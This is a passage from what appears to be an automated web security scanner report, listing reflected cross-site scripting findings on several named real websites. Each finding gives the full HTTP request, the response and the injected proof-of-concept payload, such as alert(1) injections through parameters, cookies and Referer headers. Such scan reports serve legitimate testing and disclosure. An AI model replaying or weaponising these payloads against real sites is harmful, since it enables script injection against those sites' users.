Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2; __utma=147121073.539278268.1315422878.1315422878.1315422878.1; __utmb=147121073.2.10.1315422878; __utmc=147121073; __utmz=147121073.1315422878.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:24:38 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 13878


Warning: simplexml_load_string(): Entity: line 3: parser error : error parsing attribute name in /var/www/vhosts/system.millstream.com.au/httpdocs/system/view.php on line 609

Warning: simplexml_load
...[SNIP]...
<f4033<a>d6e90fbbbbf>
...[SNIP]...

2.72. http://www.7perth.com.au/view/about/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.7perth.com.au
Path:   /view/about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32723<a>d6ae782955f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/about/?32723<a>d6ae782955f=1 HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2; __utma=147121073.539278268.1315422878.1315422878.1315422878.1; __utmb=147121073.2.10.1315422878; __utmc=147121073; __utmz=147121073.1315422878.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:24:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 10558


Warning: simplexml_load_string(): Entity: line 3: parser error : StartTag: invalid element name in /var/www/vhosts/system.millstream.com.au/httpdocs/system/view.php on line 609

Warning: simplexml_lo
...[SNIP]...
<32723<a>d6ae782955f>
...[SNIP]...

2.73. http://www.7perth.com.au/view/seven-news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.7perth.com.au
Path:   /view/seven-news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b0854<a>a3548ec987a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/seven-news/?b0854<a>a3548ec987a=1 HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:46 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 13878


Warning: simplexml_load_string(): Entity: line 3: parser error : error parsing attribute name in /var/www/vhosts/system.millstream.com.au/httpdocs/system/view.php on line 609

Warning: simplexml_load
...[SNIP]...
<b0854<a>a3548ec987a>
...[SNIP]...

2.74. http://www.abc.net.au/perth/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /perth/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b8ad'-alert(1)-'9ea4dc44988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /perth/news/?2b8ad'-alert(1)-'9ea4dc44988=1 HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=420
Expires: Wed, 07 Sep 2011 14:21:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 48900
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<a href="http://www2b.abc.net.au/communities/asp/register.asp?from=/perth/news/?2b8ad'-alert(1)-'9ea4dc44988=1" class="gen_color1">
...[SNIP]...

2.75. http://www.linkedin.com/countserv/count/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload a7c92<img%20src%3da%20onerror%3dalert(1)>4d3bd15827 was submitted in the url parameter. This input was echoed as a7c92<img src=a onerror=alert(1)>4d3bd15827 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.perthnow.com.au%2Fbusiness%2Fbusiness-old%2Ffraud-blackmail-in-latest-oswal-claims%2Fstory-e6frg2qu-1226131700884a7c92<img%20src%3da%20onerror%3dalert(1)>4d3bd15827 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html?url=http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:31:26 GMT
Content-Length: 213

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.perthnow.com.au\/business\/business-old\/fraud-blackmail-in-latest-oswal-claims\/story-e6frg2qu-1226131700884a7c92<img src=a onerror=alert(1)>4d3bd15827"});

2.76. http://adnxs.revsci.net/imp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bf24'-alert(1)-'b7c07369c41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=814544&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3bf24'-alert(1)-'b7c07369c41
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:17:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:17:09 GMT
Content-Length: 618

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.google.com/search%3Fhl=en%26q=3bf24'-alert(1)-'b7c07369c41&inv_code=814544&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D814544%26r%3D0%26_salt%3D1883775268%26u%3Dhttp%253A%252F%252Foptimized-by
...[SNIP]...

2.77. http://feeds.mycareer.com.au/crossdomain.xml [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.mycareer.com.au
Path:   /crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93b1b'style%3d'x%3aexpression(alert(1))'b331857517d was submitted in the REST URL parameter 1. This input was echoed as 93b1b'style='x:expression(alert(1))'b331857517d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /crossdomain.xml93b1b'style%3d'x%3aexpression(alert(1))'b331857517d HTTP/1.1
Host: feeds.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_180x60_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 517
Content-Type: text/html; charset=utf-8
Location: http://syndication.mycareer.com.au/crossdomain.xml93b1b'style='x:expression(alert(1))'b331857517d
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Wed, 07 Sep 2011 14:18:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU"><head
...[SNIP]...
<a href='http://syndication.mycareer.com.au/crossdomain.xml93b1b'style='x:expression(alert(1))'b331857517d'>
...[SNIP]...

2.78. http://feeds.mycareer.com.au/jobresults [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.mycareer.com.au
Path:   /jobresults

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4bedc'style%3d'x%3aexpression(alert(1))'3c198456447 was submitted in the REST URL parameter 1. This input was echoed as 4bedc'style='x:expression(alert(1))'3c198456447 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /4bedc'style%3d'x%3aexpression(alert(1))'3c198456447?s=102&state=nsw&c=3&s_cid=597799&format=xml HTTP/1.1
Host: feeds.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_180x60_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 546
Content-Type: text/html; charset=utf-8
Location: http://syndication.mycareer.com.au/4bedc'style='x:expression(alert(1))'3c198456447?s=102&state=nsw&c=3&s_cid=597799&format=xml
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Wed, 07 Sep 2011 14:20:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU"><head
...[SNIP]...
<a href='http://syndication.mycareer.com.au/4bedc'style='x:expression(alert(1))'3c198456447?s=102&state=nsw&c=3&s_cid=597799&format=xml'>
...[SNIP]...

2.79. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ee5d"-alert(1)-"91ff5e258ee was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/21770-15.js?cb=721461&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=9ee5d"-alert(1)-"91ff5e258ee; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7725/12338; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:28 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:28 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:28 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^129; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63931; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3239

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=9ee5d"-alert(1)-"91ff5e258ee\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.80. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa71f"-alert(1)-"0030f063de1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/21770-2.js?cb=69135394&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=aa71f"-alert(1)-"0030f063de1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:19 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:19 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:14:19 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^9; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63940; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3239

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=aa71f"-alert(1)-"0030f063de1\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.81. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22678-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b2e"-alert(1)-"a79f1d07a25 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/22678-15.js?cb=9938969&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=63b2e"-alert(1)-"a79f1d07a25; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^16&12590^6; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:32:15 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:32:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:32:15 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^96&12590^119; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62864; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3199

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=63b2e"-alert(1)-"a79f1d07a25\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.82. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22678-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb08b"-alert(1)-"f87da27032a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/22678-2.js?cb=89263094&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
